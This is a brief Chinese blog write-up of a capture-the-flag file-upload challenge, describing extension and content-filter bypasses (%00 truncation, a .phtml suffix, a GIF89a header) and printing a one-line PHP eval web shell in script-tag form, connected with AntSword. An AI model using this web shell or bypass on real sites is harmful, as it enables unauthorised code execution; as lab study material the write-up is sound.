[极客大挑战 2019] - Upload

不急先扫下目录,等会猜文件上传目录。猜测在upload目录下

文件上传,第一步是绕过前端过滤

最简单的方法就是上传图片马,之后bp改文件后缀

后端也存在过滤,那么就试试%00截断,上传成功,但是还有内容检测,普通php一句话不能用,特殊的一句话蚁剑也不能成功解析截断后的文件

.

试试其他生僻一句话后缀,发现phtml可以使用,且这次写入的特殊的JS一句话为:

GIF89a
<script language="php">eval($_POST[shell]);</script>

蚁剑连接

http://e2cf5e2f-c361-4a05-bc6d-30c4970f056a.node3.buuoj.cn/upload/shell.phtml

flag在根目录

posted @ 2020-06-23 22:12  ch0bits  阅读(273)  评论(0编辑  收藏  举报